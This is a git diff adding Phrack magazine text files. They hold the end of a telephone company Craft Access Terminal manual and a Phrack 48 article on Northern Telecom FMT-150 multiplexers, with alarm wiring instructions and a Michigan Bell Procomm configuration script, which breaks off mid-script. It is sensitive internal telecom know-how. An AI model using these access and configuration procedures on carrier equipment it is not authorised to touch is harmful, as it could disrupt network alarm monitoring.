+           on the keypad. If you make a mistake press the asterisk (*)
+           to erase the password and start over. The cursor will return
+           to the place where the password must be filled in.
+
+          The Terminal Identification number is located below the
+           transmitter (see page 2).
+
+          When the correct numbers are filled in, move the Pointer to
+           the right side (anywhere along the right side will do) and
+           press. The Craft Access Terminal will send your password to
+           the computer.
+
+
+
+                                      -13-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+         See "Working with the Craft Access System Computer" for further
+          instructions about what to do next.
+
+
+        Disconnect
+
+         If your call to a computer is accidentally dis connected, move
+          the switch to the Monitor position and repeat from the first
+          step to re-dial.
+
+
+         If you want to disconnect, move the switch to Monitor and this
+          screen will appear.
+
+
+
+                                      -14-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Working with the Craft Access System Computer
+
+
+
+         Each line on a screen is either:
+
+          - information
+
+          - a space in which information can be filled in
+
+          - a choice that can be selected
+
+
+         This screen is an example. Information can be read on the first
+          line, a number is to be entered on the second line, and you
+          can make a choice between the last two lines. Lines that don't
+          contain selectable choices begin with a bar (I). Those that
+          are selectable choices begin with a blank space.
+
+
+               ----------------------
+
+               Getting Help
+
+         To get help about the third line of this screen, move the
+          Pointer along the left side until a question mark appears
+          beside the third line. When the question mark is beside the
+          line, press the Pointer. The help that appears de scribes what
+          will happen if you select choice 1.
+
+         To get help about the second line of this screen, a line in
+          which information can be filled in, move the Pointer along the
+          left side until a question mark (?) appears in the space where
+          information is to be filled in and then press.
+
+
+
+                                      -15-
+
+
+
+
+        -----------------------------------------------------------
+
+
+         This is an example of an explanation. A bar (I) appears to the
+          left of every line and there is a page number in the top right
+          corner of the screen. This page is numbered 1/2, indicating
+          that it is the first page of two pages of information. the
+          second page will be numbered 2/2.
+
+         To read the next page of Help, move the Pointer to the right
+          side (anywhere along the right side will do) and press.
+
+
+         If you want to re-read pages, point to REVIEW (move the Pointer
+          to the bottom center position and press) to go back one page
+          at a time.
+
+         When you are ready to go back to the screen where you
+          originally requested help, point to BACK (move the Pointer to
+          the top center and press).
+
+
+
+                                      -16-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Making or Canceling a Selection on a Screen
+
+
+
+
+         Making a Selection
+
+          When a screen that contains selectable choices is shown, move
+           the Pointer along the right side until the arrow (>) is
+           beside the choice you want. Then press the Pointer to make
+           the selection.
+
+         Some choices make requests of a computer that may take a while.
+          If so, a "request in progress" message such as this will
+          appear.
+
+
+
+
+
+                                      -17-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Canceling a Selection
+
+
+         If at this point you realize that you've made a wrong choice,
+          point to BACK (move the Pointer to the top center and press).
+          The screen on which you made the choice will be shown and you
+          can make a different choice.
+
+         Some requests cannot be canceled. In this case, only "request
+          in progress" is displayed.
+
+
+
+
+
+
+
+                                      -18-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Reading Information Stored in the Craft Access Terminal
+
+
+         Some of the information sent to you from the computer may be
+          stored in the Craft Access Terminal in case you need it again
+          later, even if your terminal is disconnected as long as its
+          battery pack is charged. If you want to see stored
+          information, move the switch to either Monitor or Voice and
+          point to REVIEW (move the Pointer to the bottom center and
+          press).
+
+
+         A list containing the major categories of information currently
+          stored in your Craft Access Terminal will appear on the
+          screen. To select a category, move the Pointer along the right
+          side until the arrow (>) is beside the category that you want
+          to select and then press the Pointer.
+
+         Sometimes an item that you have selected leads to another list.
+          Make a selection from this list in the same way you did on the
+          previous list. To quit reading, point to BACK (move the
+          Pointer to the top center and press). To reread pages of
+          stored information, point to REVIEW (move the Pointer to the
+          bottom center position) and then press the Pointer.
+
+
+
+
+
+
+                                      -19-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Filling in Information on the Craft Access Terminal
+
+         If a screen contains a space where a number can be filled in,
+          the cursor will be blinking at the space. If there is already
+          a number in the space you may want to change it. If you decide
+          to use the number that is already shown, point to NEXT (move
+          the Pointer to any position on the right side and press).
+
+         If you want to change the number, press the asterisk (*) to
+          erase the wrong number, then fill in the number you want.
+
+         When the desired number is shown, point to NEXT (move the
+          Pointer to any position on the right side and press).
+
+
+
+                                      -20-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+         Sometimes you may need to return to a screen to correct an
+          entry.
+
+         When you point to BACK (move the Pointer to the top center and
+          press), the cursor will appear at the beginning of the first
+          place where information was filled in.
+
+         Press the asterisk (*) on the keypad to erase the entered
+          number or make a correction by typing over the incorrect
+          number with the correct number.
+
+
+
+                                      -21-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+         If there are several spaces to be filled in on one screen, move
+          the Pointer along the right side of the control to point to
+          each location where you can enter information. Don't press the
+          Pointer until you have filled in all the required information.
+
+         If a space where information can be filled in is preceded with
+          an asterisk (*), the information is optional and the space may
+          be left without an entry.
+
+         After you have filled in all of the information you need, point
+          to NEXT (move the Pointer to any position on the right side
+          and press).
+
+         Display of the asterisk is actually controlled by the Craft
+          Access System computer. Keep in mind that this can change.
+
+
+                                      -22-
+
+
+
+
+        -----------------------------------------------------------
+
+
+
+
+         Sometimes the Craft Access System will allow you to enter the
+          letters and punctuation marks to fill in the information that
+          is needed. Whenever this is the case, this screen is
+          displayed.
+
+        Entering Alphabetical and Numeric Characters
+
+         Letters, numbers and punctuation marks are entered from the
+          keypad. All characters you enter appear on the screen.
+
+         Each key is used to enter four different characters as labeled
+          on the key; except for the [#] key. The [SP] on the [#] key is
+          used to enter a space between two words.
+
+         Two easy methods can be used to enter characters:
+
+         - Method 1: Press and hold down the key with the desired
+           character. Look at the display while holding down the key.
+           You will see each character labeled on that key appear one
+           after the other. When the desired character appears, release
+           the key and that character will remain on the screen, and the
+           cursor will advance to the next position.
+
+         - Method 2: There is no need to continuously watch the screen
+           with this method. Instead of holding down the key you rapidly
+           tap the key a number of times equal to the position of the
+           desired character on that key.
+
+           For example, tap the [6] key three times to enter [N]; tap
+           the [3] key three times to enter [E]; tap the [9] key twice
+           to enter [w] and tap the [#] key twice to enter a space.
+
+         A blinking dark block on the screen indicates you have entered
+          you last character.
+
+
+                                      -23-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Erasing a Character, an Entire Line or more.
+
+         If you want to erase a character, push the pointer to the left
+          and press once. Holding the pointer down it will continue to
+          erase characters one at a time until it is released.
+
+        Sending Your Message to the Computer
+
+         When you are through entering the message, move the pointer to
+          the right and press it to send your message. The cursor should
+          stop blinking to indicate that your message has been sent.
+
+
+                                      -24-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        Taking Care of Your Terminal
+
+         1. To avoid damaging the Craft Access Terminal
+
+          - Don't drop the terminal. During the work day, the Craft
+            Access Terminal should be in the cab of your vehicle or
+            clipped to your tool belt when not in use
+
+          - Don't unnecessarily expose the terminal to dust, sand,
+            water, or salt air.
+
+         2. Problems Caused by Extreme Temperatures
+
+           Heat
+
+           The Craft Access Terminal can be damaged by extreme Heat.
+           DON'T LEAVE IT ON THE DASH OF YOUR VEHICLE.
+
+           Cold
+
+           Cold is less likely to damage the terminal. However, the
+           screen won't work properly at temperatures less than -20
+           degrees Fahrenheit. If you must use your terminal in colder
+           temperatures, you can use it for about 20 minutes in the
+           cold, then place it somewhere warm for 15 to 30 minutes and
+           then use it in the cold again.
+
+         3. Problems Caused by Water, Condensation, and High Humidity.
+
+           Don't expose the terminal to water; especially avoid dropping
+           the terminal in water. If it does get wet, dry it immediately.
+           The Craft Access Terminal will work in rain or snow, but
+           should be wiped dry whenever possible.
+
+         4. How to store the Craft Access Terminal and spare batteries.
+
+           When not in use, the Craft Access Terminal or spare battery
+           pack should be connected to the charger.
+
+         5. Under some abnormal conditions, the terminal may lock itself
+            into an incorrect state. To "reset" the terminal, simply
+            insert the battery charger plug into the charge jack, then
+            remove. CAUTION: This will erase any stored information.
+
+
+
+
+                                      -25-
+
+
+
+
+        -----------------------------------------------------------
+
+
+        For Quick Reference:
+
+
+
+                            .-------------------------------------.
+                            : -To quit reading stored information :
+                            : -To go back to a screen you saw     :
+                            :   previously                        :
+                            :        .----------------------------'
+                            : BACK   :
+  .-----------------------. :        : .---------------------------.
+  :                   b   : :   O    : :                           :
+  : -To get           a O : `--------' :O n S -to select a choice  :
+  :  explanation of H c   :            :                           :
+  :  selectable     E k O :            :O e E -to read new page of :
+  :  items          L s   : (JOYSTICK) :       help or new page of :
+  :                 P p O :            :O x N  stored information  :
+  : -To erase a       a   :            :                           :
+  :  character or     c O : .--------. :O t D -to send mail        :
+  :  line             e   : :   O    : `---------------------------'
+  :                       : : REVIEW :
+  :  (ALPHA-ENTRY)        : :        `-------------------------.
+  :   (MODE ONLY)         : :                                  :
+  `-----------------------' :                                  :
+                            : -To read information stored in   :
+                            :  the Craft Access Terminal       :
+                            :                                  :
+                            : -To read previous page of help   :
+                            :  or store information            :
+                            :                                  :
+                            `----------------------------------'
+
+
+     -----------------------------------------------------------
+
+
+          FCC Regulations for Telephone Equipment
+          (you know all this crap)
+
+
+
+
+     -----------------------------------------------------------
+
+        (BACK COVER)
+
+              (END)
+
+          -------------------------------------------------------
+
+
+        Few last notes:
+
+        The real Craft handsets do not have a power switch, they just
+         sit on all of the time. So we could also add a power switch to
+         ours.
+
+        The Craft handset uses a 1200 baud modem, but seems to be
+         incompatible with standard modems...
+
diff --git a/phrack48/9.txt b/phrack48/9.txt
new file mode 100644
index 0000000..b451373
--- /dev/null
+++ b/phrack48/9.txt
@@ -0,0 +1,695 @@
+                              ==Phrack Magazine==
+
+                 Volume Seven, Issue Forty-Eight, File 9 of 18
+
+---------------------------------------------------------------------------
+		Information about Northern Telecom's FMT-150B/C/D
+				Written by StaTiC
+				(statik@free.org)
+--------------------------------------------------------------------------- 
+
+        Ok, I know someone wrote an article in Phrack about the
+FMT-150B/C/D, but I figured I should write some more.  I am not going to
+write the same info that FyberLyte wrote, in fact I recommend you go and
+check it out.  It is in Phrack #44-13.  This is some stuff I obtained,
+that I figured the rest of the world would be interested in.
+
+Included info: 	Connecting a FMT-150 to a Rockwell OS-35
+		Connecting Environmental Alarms to the FMT-150
+		Procomm Script to Perform Configuration of FMT-150
+		FMT-150 Configuration Checklist 
+		Glossary of Terms
+
+
+------------------------------------------------------------------------------
+
+            INSTRUCTIONS FOR X-CONNECTING FMT-150 CUSTOMER OUTPUT TO
+                              ROCKWELL OS-35 INPUTS
+
+     A pin block will be provided at the central office location, in the
+     bay equipped with FMT-150 equipment.  The pin block will provide
+     the termination points for the Rockwell OS-35A and the FMT-150
+     customer output alarms. Each pin block will be able to support a
+     maximum of 16 FMT-150 systems, see pin block diagram.
+
+     Wiring of the FMT-150 customer outputs points and the OS-35A points
+     will be done by the vender on the back of the pin block.
+
+     Once a FMT-150 system has been certified the certification team
+     will be responsible for x-connecting the FMT-150 customer output
+     alarm points to the appropriate OS-35A points on the front of the
+     pin block. Completion of this x-connecting will allow FMT-150
+     system alarms originating either from the CO or the RT to be
+     transported via the OS-35A back to the Lightwave and Radio Alarm
+     Center.
+
+     IMPORTANT, MBT CERTIFICATION TEAMS X-CONNECT ONLY THE FMT-150 THAT
+     IS BEING PUT INTO SERVICE AND ONLY AFTER THE ELECTRONICS ARE
+     CERTIFIED.
+
+     The FMT-150 16 customer outputs are defined as follows:
+
+          OUTPUT        ALARM        OUTPUT        ALARM
+          ------        -----        ------        -----
+            1         BAY MAJOR        9          MI3 ALARM #3
+            2         BAY MINOR        10         HSA ALARM
+            3         OPT A FAIL       11         HSB ALARM
+            4         OPT B FAIL       12         DS1 GRP FAIL
+            5         STX TX           13         SYSTEM ID CLLI
+            6         STS RX           14         COMM. EQUIP. ALARM
+            7         M13 ALARM #1     15         NODE #1 CO
+            8         M13 ALARM #2     16         NODE #2 REMOTE
+
+     The Rockwell OS-35A provides a total of 32 separate alarm points.
+     The first 16 points with the exception of point 13 have been
+     multiplied on the pin block to provide x-connect points for a total
+     of 16 FMT-150 systems, see pin block diagram.
+
+     On the pin block x-connect the designated (1 of 16) FMT-150 system
+     customer outputs, pins 1-12 and 14-16 to the appropriate OS-35A
+     pins 1-12 and 14-16, see pin block diagram.
+
+     Pins 17-32 on the pin block going to the OS-35A will be used for
+     x-connecting the customer output #13 from each FMT-150 system.
+     Customer output #13 provides the system ID for the FMT-150, see pin
+     block diagram.
+
+         X-CONNECT CUSTOMER OUTPUT #13 FROM FMT-150 SYSTEMS IN
+         THIS SEQUENCE
+
+                        OS-35A    FMT-150 System
+                        ------    --------------
+                        PIN 17      SYSTEM 1
+                        PIN 18      SYSTEM 2
+                          :            :
+                          :            :
+                        PIN 31      SYSTEM 15
+                        PIN 32      SYSTEM 16
+
+     AGAIN, WIRE ONLY THE FMT-150 SYSTEM THAT IS BEING PUT INTO SERVICE
+     AND ONLY AFTER CERTIFICATION OF ELECTRONICS HAVE BEEN COMPLETED.
+
+     After x-connects have been completed on FMT-150 system that has
+     been certified, contact the Alarm Center at (313) 223-9688 and
+     verify that all 16 customer output alarm conditions at both the CO
+     and RT can be activated and are reporting via the OS-35A back to
+     the alarm center.
+
+     The Lightwave Alarm Center will monitor the FMT-150 system for a 24
+     hour quiet period for alarms.  During this 24 hour period if no
+     alarms are detected by the Lightwave Alarm Center, the FMT-150 will
+     be considered certified for alarming and ready for continual
+     monitoring.
+
+     If during the 24 hour quiet period the alarm center receives alarms
+     from the FMT-150 system, it will not be certified for continual
+     monitoring and it will be the responsibility of the MBT
+     Certification Teams to resolve those alarms.
+
+
+----------------------------------------------------------------------------
+
+           INSTRUCTIONS FOR CROSS CONNECTING ENVIRONMENTAL ALARMS TO
+                               THE FMT-150 INPUTS.
+
+     Environmental alarms at remote locations may be connected to the
+     FMT-150 customer inputs.  If more than one system exists, these
+     alarms should only be connected to the first.  Since many remotes
+     will not be equipped with all of these alarms, a checklist has been
+     provided on the system acceptance sheets to indicate which have
+     been wired.  The alarms provided for are Smoke Detector, Sump Pump,
+     Open Door, AC Power Fail, HI-LO Temperature, Rectifier Fail, and
+     Battery Float.  These are wired to pins D8 through E9 on the
+     FMT-150 backplane.  See Shelf Backplane Detail, attached.
+
+     All Customer Inputs are software connected to Customer Output #12.
+     They will also bring in Bay Minor (Output #1) or Bay Major (Output
+     #2) as appropriate.  Inputs #1 (Smoke Detector) and #2 (Sump Pump)
+     are latching inputs that can only be cleared by accessing the MCU
+     with a VT100 terminal.  See Section 321-3211-01, DP 3003, page 2.
+
+     FMT-150 systems using external inputs for environmental alarms and
+     which use E2 telemetry rather than the OS-35 MUST be provided with
+     type NT7H90XH Maintenance Control Units at both ends.
+
+     External alarm operation and telemetry if equipped, should be
+     verified with the Alarm Center during acceptance.
+
+
+
+
+--------------------------------------------------------------------------
+		Procomm Script for Accessing FMT-150B/C/D
+
+;**********************************************************************
+;*                                                                    *
+;*    FMT150.CMD       Version 5.00        Dec 18, 1990               *
+;*    Please Destroy all previous versions of this program!           *
+;*                                                                    *
+;*    NOTE:  Procomm is a product of Datastorm Technologies           *
+;**********************************************************************
+;         
+;     The  script  FMT150.CMD was written to automatically  perform
+;     all  configuration commands for the Northern Telecom  FMT-150
+;     fiber  optic multiplexer.   Specifically,  this  script  will
+;     complete   over  125  configuration   commands   (performance
+;     threshold,  error correction,  and alarm outputs) as outlined
+;     in Section 4 of the Michigan Bell Certification Procedure for
+;     the   FMT-150.    This  program  is   compatible   with   all
+;     certification requirements for FMT-150  MCU NT7H90XA  or  MCU
+;     NT7H90XE.
+;    
+;     Requirements:
+;     1)  Toshiba T1000 craft terminal or DOS equivalent.
+;     2)  Proper serial cables and adapters.
+;     3)  Procomm disk with FMT150.CMD file.
+;    
+;     Procedure for use:
+;     1)  Remove disk from drive, then turn on computer.  When the DOS 
+;         prompt appears insert the PROCOMM disk into disk drive.  
+;         Enter the command "A:" + <ENTER>.
+;     2)  Enter the command "FIXPRN" + <ENTER>.
+;     3)  Enter the command "PROCOMM" + <ENTER>.
+;     4)  While holding the <ALT> key down, press the <D> key, 
+;         and select FMT-150 from the dialing menu.
+;     5)  Gain access to MCU as normal (press the <ENTER> key 3 times).
+;     6)  Once logged in, reset the MCU to factory default by
+;         entering "M"(aintenance) "R"(eset) "*"(all) + <ENTER>.
+;         It will take approximately three minutes to reconfigure.
+;     7)  Gain access to MCU again as in steps 3) & 4).
+;     8)  Select the script by pressing <ALT><F5> keys simultaneously.
+;     9)  When prompted for command file enter "FMT150" + <ENTER>.
+;     10) Answer questions and away you go!
+;
+; HISTORY: Version 4.00 May 15, 1990 by AQW final release version
+; HISTORY: Version 4.10 Aug 08, 1990 by JBH mod to use VPRINT to divert
+;          printer into a better bit bucket, and to correct callback #.
+; HISTORY: Version 4.12 Nov 21, 1990 by EEE to use Customer Inputs
+; HISTORY: Version 5.00 Dec 18, 1990 by JBH to update documentation
+;SN051690000
+;REFNO=5.00
+CLEAR
+PAUSE 1
+ALARM 1
+MESSAGE " "
+MESSAGE "            *************************************************"
+MESSAGE "            *                                               *"
+MESSAGE "            * FMT-150 MCU NT7H90XC\CA CONFIGURATION PROGRAM *"
+MESSAGE "            *         MCU NT7H90XE\EA CONFIGURATION PROGRAM *"
+MESSAGE "            *                                               *"
+MESSAGE "            *      VERSION 5.00         DEC 18, 1990        *"
+MESSAGE "            *                                               *"
+MESSAGE "            *       MICHIGAN BELL TELEPHONE COMPANY         *"
+MESSAGE "            *           A DIVISION OF AMERITECH             *"
+MESSAGE "            *                                               *"
+MESSAGE "            *                                               *"
+MESSAGE "            *************************************************"
+MESSAGE " "
+MESSAGE " "
+MESSAGE "          ....TO EXIT THIS PROGRAM AT ANY TIME, PRESS <ESC>...."
+PAUSE 3
+ALARM 1
+
+;VARIABLE DOCUMENTATION
+;S0=CLLI A USER INPUT
+;S1=CLLI B USER INPUT
+;S2=CLLI LOCAL USER INPUT
+;S3=YEAR 2 DIGIT USER INPUT
+;S4=MONTH 2 DIGIT USER INPUT
+;S5=DAY 2 DIGIT USER INPUT
+;S6=HOUR 2 DIGIT USER INPUT
+;S7=MINUTE 2 DIGIT USER INPUT
+;S8=SYSTEM ID & USER RESPONSE USED TO CONTROL PROGRAM FLOW
+;S9=SYSTEM NUMBER
+
+LABEL1:
+
+; note the following statement was superseded in version 4.10 by VPRINT
+;DOS "MODE LPT1:=COM2:" ; REQUIRED TO TURN PRINTER ERROR OFF
+; following flushes the "RUB" buffer
+TRANSMIT "^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H"
+CLEAR
+LOCATE 10,2
+MESSAGE "Enter CLLI code for LOCATION A (C.O.) using full 8 or 11 characters:"
+LOCATE 12,2
+GET S0 11 ;CLLI A
+MESSAGE " "
+CLEAR
+LOCATE 10,2
+MESSAGE "Enter CLLI code for LOCATION B (REMOTE) using full 8 or 11 characters:"
+LOCATE 12,2
+GET S1 11 ;CLLI B
+MESSAGE " "
+CLEAR
+LOCATE 10,2
+MESSAGE "Enter CLLI code for YOUR location using full 8 or 11 characters:"
+LOCATE 12,2
+GET S2 11
+
+CLEAR
+LOCATE 8,2
+MESSAGE "Enter system ID without 'MI', for example ALBNMN-JCSNMN."
+LOCATE 10,2
+GET S8 13
+LOCATE 13,2
+MESSAGE "Enter system number, for example 1201 / T3X."
+LOCATE 15,2
+GET S9 15
+
+TRANSMIT "CGNS"
+TRANSMIT "`""
+TRANSMIT S8
+TRANSMIT "`""
+TRANSMIT "!"
+
+CLEAR
+LOCATE 6,2
+MESSAGE "Enter today's date."
+LOCATE 8,2
+MESSAGE "Enter two digit year + <ENTER>"
+LOCATE 8,34
+GET S3 2 ; 2 DIGIT YEAR
+LOCATE 10,2
+MESSAGE "Enter two digit month + <ENTER>.  Use 0's if required."
+LOCATE 10,58
+GET S4 2 ; 2 DIGIT MONTH
+LOCATE 12,2
+MESSAGE "Enter two digit day + <ENTER>.  Use 0's if required."
+LOCATE 12,56
+GET S5 2 ; 2 DIGIT DAY
+CLEAR
+LOCATE 6,2
+MESSAGE "Enter time."
+LOCATE 8,2
+MESSAGE "Enter two digit hour + <ENTER>.  Use 0's if required."
+LOCATE 8,57
+GET S6 2 ; 2 DIGIT HOUR
+LOCATE 10,2
+MESSAGE "Enter two digit minute + <ENTER>.  Use 0's if required."
+LOCATE 10,59
+GET S7 2 ; 2 DIGIT MINUTE
+CLEAR
+
+;SET TIME DP3025
+TRANSMIT "CT"
+TRANSMIT S6
+TRANSMIT " "
+TRANSMIT S7
+TRANSMIT " !"
+PAUSE 1
+KFLUSH
+RFLUSH
+CLEAR
+
+;PROMPT THE USER TO CHECK INPUTS FOR LOCATIONS
+LOCATE 1,2
+MESSAGE "Please verify the following information."
+LOCATE 4,2
+MESSAGE "LOCATION A CLLI CODE = "
+LOCATE 4,26
+MESSAGE S0
+LOCATE 6,2
+MESSAGE "LOCATION B CLLI CODE = "
+LOCATE 6,26
+MESSAGE S1
+LOCATE 8,2
+MESSAGE "LOCAL LOCATION CLLI CODE ="
+LOCATE 8,29
+MESSAGE S2
+LOCATE 10,2
+MESSAGE "SYSTEM ID = "
+LOCATE 10,17
+MESSAGE S8
+LOCATE 12,2
+MESSAGE "SYSTEM NUMBER = "
+LOCATE 12,21
+MESSAGE S9
+LOCATE 17,2
+MESSAGE "IS INFORMATION CORRECT?  Y/N + <ENTER>"
+LOCATE 17,44
+GET S8 1
+SWITCH S8
+     CASE "Y"
+          ;DO NOTHING
+     ENDCASE
+     DEFAULT
+          GOTO LABEL1 ; JUMP TO TOP AND ENTER INFORMATION AGAIN
+     ENDCASE
+ENDSWITCH
+CLEAR
+LOCATE 8,15
+MESSAGE "DO NOT PRESS ANY KEYS UNTIL CONFIGURATION COMPLETE"
+LOCATE 10,15
+MESSAGE "OK...HERE WE GO..."
+ALARM 1
+PAUSE 2
+
+;SET DATE DP3024
+TRANSMIT "CD"
+TRANSMIT S3
+TRANSMIT " "
+TRANSMIT S4
+TRANSMIT " "
+TRANSMIT S5
+TRANSMIT " !"
+PAUSE 1
+
+;NAME NODE 1 USING CENTRAL OFFICE CLLI CODE
+TRANSMIT "CGNN1 "
+TRANSMIT "`""
+TRANSMIT S0
+TRANSMIT "`""
+TRANSMIT "!"
+
+;NAME NODE 2 USING REMOTE CLLI CODE
+TRANSMIT "CGNN2 "
+TRANSMIT "`""
+TRANSMIT S1
+TRANSMIT "`""
+TRANSMIT "!"
+
+;DEFINE SITE
+TRANSMIT "CGS1 1 2 !"
+;TRANSMIT "`""
+;TRANSMIT S0
+;TRANSMIT "`""
+;TRANSMIT S1
+;TRANSMIT " "
+;TRANSMIT "!"
+
+;CONFIGURE CUSTOMER OUTPUT POINTS DP3013
+TRANSMIT "CGNO1 "
+TRANSMIT "`"BAY MINOR`""
+TRANSMIT "!"
+TRANSMIT "CGNO2 "
+TRANSMIT "`"BAY MAJOR`""
+TRANSMIT "!"
+TRANSMIT "CGNO3 "
+TRANSMIT "`"OPT A FAIL`""
+TRANSMIT "!"
+TRANSMIT "CGNO4 "
+TRANSMIT "`"OPT B FAIL`""
+TRANSMIT "!"
+TRANSMIT "CGNO5 "
+TRANSMIT "`"STX TX`""
+TRANSMIT "!"
+TRANSMIT "CGNO6 "
+TRANSMIT "`"STX RX`""
+TRANSMIT "!"
+TRANSMIT "CGNO7 "
+TRANSMIT "`"M13 ALARM #1`""
+TRANSMIT "!"
+TRANSMIT "CGNO8 "
+TRANSMIT "`"M13 ALARM #2`""
+TRANSMIT "!"
+TRANSMIT "CGNO9 "
+TRANSMIT "`"M13 ALARM #3`""
+TRANSMIT "!"
+TRANSMIT "CGNO10 "
+TRANSMIT "`"HSA ALARM`""
+TRANSMIT "!"
+TRANSMIT "CGNO11 "
+TRANSMIT "`"HSB ALARM`""
+TRANSMIT "!"
+;TRANSMIT "CGNO12 "
+;TRANSMIT "`"DS1 GRP FAIL`""
+;TRANSMIT "!"
+TRANSMIT "CGNO13 "
+TRANSMIT "`""
+TRANSMIT S9
+TRANSMIT "`""
+TRANSMIT "!"
+TRANSMIT "CGNO14 "
+TRANSMIT "`"COM EQUIP ALRM`""
+TRANSMIT "!"
+TRANSMIT "CGNO15 "
+TRANSMIT "`"NODE #1 CO`""
+TRANSMIT "!"
+TRANSMIT "CGNO16 "
+TRANSMIT "`"NODE #2 REMOTE`""
+TRANSMIT "!"
+
+;DELETE ALL EXISTING CUSTOMER OUTPUTS
+TRANSMIT "CGO1 D*!"
+TRANSMIT "CGO2 D*!"
+TRANSMIT "CGO3 D*!"
+TRANSMIT "CGO4 D*!"
+TRANSMIT "CGO5 D*!"
+TRANSMIT "CGO6 D*!"
+TRANSMIT "CGO7 D*!"
+TRANSMIT "CGO8 D*!"
+TRANSMIT "CGO9 D*!"
+TRANSMIT "CGO10 D*!"
+TRANSMIT "CGO11 D*!"
+TRANSMIT "CGO12 D*!"
+TRANSMIT "CGO13 D*!"
+TRANSMIT "CGO14 D*!"
+TRANSMIT "CGO15 D*!"
+TRANSMIT "CGO16 D*!"
+
+;CUSTOMER OUTPUTS 1-2
+TRANSMIT "CGO1 AS1 G100 !"
+TRANSMIT "CGO2 AS1 G120 !"
+
+;CUSTOMER OUTPUTS 3-9
+TRANSMIT "CGO3 AS1 G107 !"
+TRANSMIT "CGO4 AS1 G108 !"
+TRANSMIT "CGO5 AS1 G101 !"
+TRANSMIT "CGO5 AS1 G102 !"
+TRANSMIT "CGO5 AS1 G103 !"
+TRANSMIT "CGO6 AS1 G104 !"
+TRANSMIT "CGO6 AS1 G105 !"
+TRANSMIT "CGO6 AS1 G106 !"
+TRANSMIT "CGO7 AS1 G109 !"
+TRANSMIT "CGO8 AS1 G110 !"
+TRANSMIT "CGO9 AS1 G111 !"
+
+;CUSTOMER OUTPUTS 10-11
+TRANSMIT "CGO10 AS1 M1 MH18 !"
+TRANSMIT "CGO10 AS1 M2 MH18 !"
+TRANSMIT "CGO10 AS1 M3 MH18 !"
+TRANSMIT "CGO11 AS1 M1 MH19 !"
+TRANSMIT "CGO11 AS1 M2 MH19 !"
+TRANSMIT "CGO11 AS1 M3 MH19 !"
+;TRANSMIT "CGO12 AS1 M1 1H2 !"
+;TRANSMIT "CGO12 AS1 M2 1H2 !"
+;TRANSMIT "CGO12 AS1 M3 1H2 !"
+;TRANSMIT "CGO12 AS1 M1 1H3 !"
+;TRANSMIT "CGO12 AS1 M2 1H3 !"
+;TRANSMIT "CGO12 AS1 M3 1H3 !"
+
+;CUSTOMER OUTPUT 13, 14
+TRANSMIT "CGO13 AS1 G100 !"
+TRANSMIT "CGO13 AS1 G120 !"
+TRANSMIT "CGO14 AS1 G112 !"
+
+;CUSTOMER OUTPUTS 15, 16
+TRANSMIT "CGO15 AN1 G100 !"
+TRANSMIT "CGO15 AN1 G120 !"
+TRANSMIT "CGO16 AN2 G100 !"
+TRANSMIT "CGO16 AN2 G120 !"
+
+;SET TO AUTOMATIC CONTROL
+TRANSMIT "CGO1 CA!"
+TRANSMIT "CGO2 CA!"
+TRANSMIT "CGO3 CA!"
+TRANSMIT "CGO4 CA!"
+TRANSMIT "CGO5 CA!"
+TRANSMIT "CGO6 CA!"
+TRANSMIT "CGO7 CA!"
+TRANSMIT "CGO8 CA!"
+TRANSMIT "CGO9 CA!"
+TRANSMIT "CGO10 CA!"
+TRANSMIT "CGO11 CA!"
+TRANSMIT "CGO12 CA!"
+TRANSMIT "CGO13 CA!"
+TRANSMIT "CGO14 CA!"
+TRANSMIT "CGO15 CA!"
+TRANSMIT "CGO16 CA!"
+;
+;DEFINE CUSTOMER OUTPUT 12
+TRANSMIT "CGO12 D*!"
+TRANSMIT "CGNO12 "
+TRANSMIT "`"EXT ALM`""
+TRANSMIT "!"
+TRANSMIT "CGO12 AN2 G118 !"
+;also attach to pt 13 for alarm center ID
+TRANSMIT "CGO13 AN2 G118 !"
+;
+;DEFINE CUSTOMER INPUTS
+TRANSMIT "CGNI1 "
+TRANSMIT "`"SMOKE DET.`""
+TRANSMIT "!"
+TRANSMIT "CGNI2 "
+TRANSMIT "`"SUMP PUMP`"" 
+TRANSMIT "!" 
+TRANSMIT "CGNI3 " 
+TRANSMIT "`"OPEN DOOR`""
+TRANSMIT "!"
+TRANSMIT "CGNI4 "
+TRANSMIT "`"AC PWR FAIL`""
+TRANSMIT "!"
+TRANSMIT "CGNI5 "
+TRANSMIT "`"HI-LO TEMP`""
+TRANSMIT "!"
+TRANSMIT "CGNI6 "
+TRANSMIT "`"RECT. FAIL`""
+TRANSMIT "!"
+TRANSMIT "CGNI7 "
+TRANSMIT "`"BATT FLOAT`""
+TRANSMIT "!"
+;
+;ADD CONDITIONS TO CUSTOMER OUTPUT 1
+TRANSMIT "CGO1 AN2 SS5 !"
+TRANSMIT "CGO1 AN2 SS6 !"
+TRANSMIT "CGO1 AN2 SS7 !"
+;
+;ADD CONDITIONS TO CUSTOMER OUTPUT 2
+TRANSMIT "CGO2 AN2 SS1 !"
+TRANSMIT "CGO2 AN2 SS2 !"
+TRANSMIT "CGO2 AN2 SS3 !"
+TRANSMIT "CGO2 AN2 SS4 !"
+;
+     ;PER JOE OLSZTYN SWITCHING SYSTEMS STAFF
+     ;LEAVE PERFORMANCE MONITORING AT FACTORY DEFAULT
+     ;DISABLE BLUE INSERTION FOR POINT TO POINT SYSTEMS
+     ;IN A MULTIPOINT SYSTEM BLUE INSERTION SHOULD BE ENABLED.
+
+     ;ENABLE ALARM LOGGER
+     TRANSMIT "CAD!"
+
+     ;DISABLE BLUE INSERTION NODE 1 DP3019
+     TRANSMIT "CN1 T1 BE!"
+     TRANSMIT "CN1 T2 BE!"
+     TRANSMIT "CN1 T3 BE!"
+
+     ;ENABLE PARITY CORRECTION NODE 1 DP3020
+     TRANSMIT "CN1 T1 PE!"
+     TRANSMIT "CN1 T2 PE!"
+     TRANSMIT "CN1 T3 PE!"
+
+     ;ENABLE RX OVERHEAD NODE 1 DP3021
+     TRANSMIT "CN1 T1 RE!"
